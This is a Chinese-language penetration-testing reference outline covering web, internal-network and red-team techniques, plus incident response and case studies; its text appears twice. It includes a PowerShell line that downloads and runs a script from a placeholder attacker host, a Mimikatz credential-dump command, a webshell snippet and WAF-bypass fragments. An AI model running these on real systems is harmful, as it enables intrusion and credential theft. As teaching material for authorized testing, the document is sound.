专注Web及移动安全[红日安全74期]
字数 1750 2025-08-18 11:37:57

Web及移动安全渗透测试技术文档

一、渗透测试方法论

1.1 渗透测试范围界定

  • 明确测试边界:内部网络/外部网络/特定应用
  • 确定测试类型:黑盒/白盒/灰盒测试
  • 制定测试规则:时间窗口、攻击强度限制

1.2 渗透测试流程

  1. 信息收集阶段

    • 目标识别:域名、IP范围、网络拓扑
    • 技术栈识别:Web框架、服务器类型、编程语言
    • 开放服务扫描:端口、服务版本识别
  2. 漏洞分析阶段

    • 自动化扫描工具使用
    • 手动验证潜在漏洞
    • 业务逻辑漏洞分析
  3. 攻击利用阶段

    • 权限提升技术
    • 横向移动方法
    • 数据窃取/篡改验证
  4. 后渗透阶段

    • 持久化访问建立
    • 痕迹清理
    • 报告撰写

二、Web安全技术

2.1 WAF研究与绕过

  • 开源WAF研究:ModSecurity核心规则分析
  • 常见绕过技术
    • 编码混淆:Hex/Unicode/Base64
    • 协议层面:HTTP参数污染
    • 时间延迟攻击
    • 注释干扰:/*!50000SELECT*/

2.2 业务逻辑漏洞

  • 活动类漏洞

    • 重复领取优惠券
    • 抽奖次数篡改
    • 价格参数篡改
    • 时间条件竞争
  • 密码重置漏洞

    • 验证码爆破
    • 响应包分析
    • 邮箱/手机号篡改
    • Token预测

2.3 高级Web攻击

  • WinRAR目录穿越漏洞(CVE-2018-20250)

    • 利用原理:ACE文件头欺骗
    • 攻击载荷:恶意DLL写入启动目录
    • 防御措施:升级至5.70 beta 1版本
  • 水平越权案例

    • 用户ID枚举
    • 未授权API访问
    • 批量操作漏洞

三、内网渗透技术

3.1 主机发现技术

  • ARP扫描

    • arp-scan -l
    • Nmap ARP扫描:nmap -PR -sn 192.168.1.0/24
  • UDP扫描

    • UDP端口探测:nmap -sU -p 53,161,137 192.168.1.1
    • 响应分析:ICMP不可达判断存活

3.2 横向移动技术

  • 工作组环境渗透

    • NetBIOS名称欺骗
    • LLMNR/NBT-NS投毒
    • SMB共享爆破
  • 权限提升方法

    • 服务配置错误利用
    • 计划任务劫持
    • 凭证转储(LSASS/Mimikatz)

3.3 三层网络渗透

  • 网络拓扑架构

    • DMZ区突破
    • 双网卡主机跳板
    • VLAN跳跃攻击
  • MSF内网穿透

    # 路由添加
    route add 10.10.10.0 255.255.255.0 1
    # Socks代理建立
    use auxiliary/server/socks_proxy
    

四、安全工具集

4.1 扫描类工具

  • Angry IP Scanner

    • 多线程主机发现
    • 自定义端口扫描
    • 结果导出功能
  • Arachni Web扫描器

    arachni http://example.com --checks=sql_injection,xss
    arachni_reporter report.afr --report=html:outfile=report.html
    

4.2 密码破解工具

  • CeWL单词生成器
    cewl -d 2 -m 5 -w dict.txt https://example.com
    
    • 参数说明:
      • -d:爬取深度
      • -m:最小单词长度
      • -w:输出文件

4.3 BurpSuite插件

  • Turbo Intruder
    • 高性能爆破引擎
    • 自定义攻击脚本
    • 流量分析优化

五、应急响应

5.1 Linux应急事件

  • 挖矿病毒处置

    • 异常进程排查:top/ps auxf
    • 定时任务检查:crontab -l
    • 网络连接分析:netstat -antp
  • DDOS防御

    • iptables限速:
      iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT
      

5.2 Windows日志分析

  • 安全事件ID
    • 4624:登录成功
    • 4625:登录失败
    • 4672:特权登录
    • 4688:进程创建

六、红队技术

6.1 攻击思维框架

  • ATT&CK矩阵应用

    • 初始访问:鱼叉攻击/漏洞利用
    • 执行:命令行/Powershell
    • 持久化:注册表/服务创建
  • 隐蔽通信

    • DNS隧道:dnscat2
    • HTTP伪装:C2 over HTTPS
    • 合法云服务滥用

6.2 Powershell利用

  • 常用模块
    # 内存加载脚本
    IEX (New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
    
    # 凭证提取
    Invoke-Mimikatz -DumpCreds
    

七、漏洞管理

7.1 CNNVD漏洞月报

  • 漏洞趋势分析

    • Web应用漏洞占比
    • 移动端漏洞增长
    • 物联网设备漏洞
  • 补丁管理策略

    • 关键漏洞72小时修复
    • 漏洞扫描验证流程
    • 虚拟补丁应用

附录:实战案例

案例1:服务器入侵溯源

  1. Webshell发现:eval($_POST['cmd'])
  2. 日志分析:异常登录IP
  3. 攻击路径重建:SQLi→RCE→提权

案例2:水平越权导致批量改密

  • 漏洞点:/api/user/update?uid=123
  • 利用方式:遍历uid参数
  • 修复方案:会话绑定用户ID

本技术文档基于红日安全第74期内容整理,涵盖Web及移动安全核心知识点,可作为渗透测试参考手册使用。实际测试中请遵守法律法规,获取授权后进行。

Web及移动安全渗透测试技术文档 一、渗透测试方法论 1.1 渗透测试范围界定 明确测试边界:内部网络/外部网络/特定应用 确定测试类型:黑盒/白盒/灰盒测试 制定测试规则:时间窗口、攻击强度限制 1.2 渗透测试流程 信息收集阶段 目标识别:域名、IP范围、网络拓扑 技术栈识别:Web框架、服务器类型、编程语言 开放服务扫描:端口、服务版本识别 漏洞分析阶段 自动化扫描工具使用 手动验证潜在漏洞 业务逻辑漏洞分析 攻击利用阶段 权限提升技术 横向移动方法 数据窃取/篡改验证 后渗透阶段 持久化访问建立 痕迹清理 报告撰写 二、Web安全技术 2.1 WAF研究与绕过 开源WAF研究 :ModSecurity核心规则分析 常见绕过技术 : 编码混淆:Hex/Unicode/Base64 协议层面:HTTP参数污染 时间延迟攻击 注释干扰: /*!50000SELECT*/ 2.2 业务逻辑漏洞 活动类漏洞 : 重复领取优惠券 抽奖次数篡改 价格参数篡改 时间条件竞争 密码重置漏洞 : 验证码爆破 响应包分析 邮箱/手机号篡改 Token预测 2.3 高级Web攻击 WinRAR目录穿越漏洞(CVE-2018-20250) : 利用原理:ACE文件头欺骗 攻击载荷:恶意DLL写入启动目录 防御措施:升级至5.70 beta 1版本 水平越权案例 : 用户ID枚举 未授权API访问 批量操作漏洞 三、内网渗透技术 3.1 主机发现技术 ARP扫描 : arp-scan -l Nmap ARP扫描: nmap -PR -sn 192.168.1.0/24 UDP扫描 : UDP端口探测: nmap -sU -p 53,161,137 192.168.1.1 响应分析:ICMP不可达判断存活 3.2 横向移动技术 工作组环境渗透 : NetBIOS名称欺骗 LLMNR/NBT-NS投毒 SMB共享爆破 权限提升方法 : 服务配置错误利用 计划任务劫持 凭证转储(LSASS/Mimikatz) 3.3 三层网络渗透 网络拓扑架构 : DMZ区突破 双网卡主机跳板 VLAN跳跃攻击 MSF内网穿透 : 四、安全工具集 4.1 扫描类工具 Angry IP Scanner : 多线程主机发现 自定义端口扫描 结果导出功能 Arachni Web扫描器 : 4.2 密码破解工具 CeWL单词生成器 : 参数说明: -d :爬取深度 -m :最小单词长度 -w :输出文件 4.3 BurpSuite插件 Turbo Intruder : 高性能爆破引擎 自定义攻击脚本 流量分析优化 五、应急响应 5.1 Linux应急事件 挖矿病毒处置 : 异常进程排查: top/ps auxf 定时任务检查: crontab -l 网络连接分析: netstat -antp DDOS防御 : iptables限速: 5.2 Windows日志分析 安全事件ID : 4624:登录成功 4625:登录失败 4672:特权登录 4688:进程创建 六、红队技术 6.1 攻击思维框架 ATT&CK矩阵应用 : 初始访问:鱼叉攻击/漏洞利用 执行:命令行/Powershell 持久化:注册表/服务创建 隐蔽通信 : DNS隧道: dnscat2 HTTP伪装:C2 over HTTPS 合法云服务滥用 6.2 Powershell利用 常用模块 : 七、漏洞管理 7.1 CNNVD漏洞月报 漏洞趋势分析 : Web应用漏洞占比 移动端漏洞增长 物联网设备漏洞 补丁管理策略 : 关键漏洞72小时修复 漏洞扫描验证流程 虚拟补丁应用 附录:实战案例 案例1:服务器入侵溯源 Webshell发现: eval($_POST['cmd']) 日志分析:异常登录IP 攻击路径重建:SQLi→RCE→提权 案例2:水平越权导致批量改密 漏洞点: /api/user/update?uid=123 利用方式:遍历uid参数 修复方案:会话绑定用户ID 本技术文档基于红日安全第74期内容整理,涵盖Web及移动安全核心知识点,可作为渗透测试参考手册使用。实际测试中请遵守法律法规,获取授权后进行。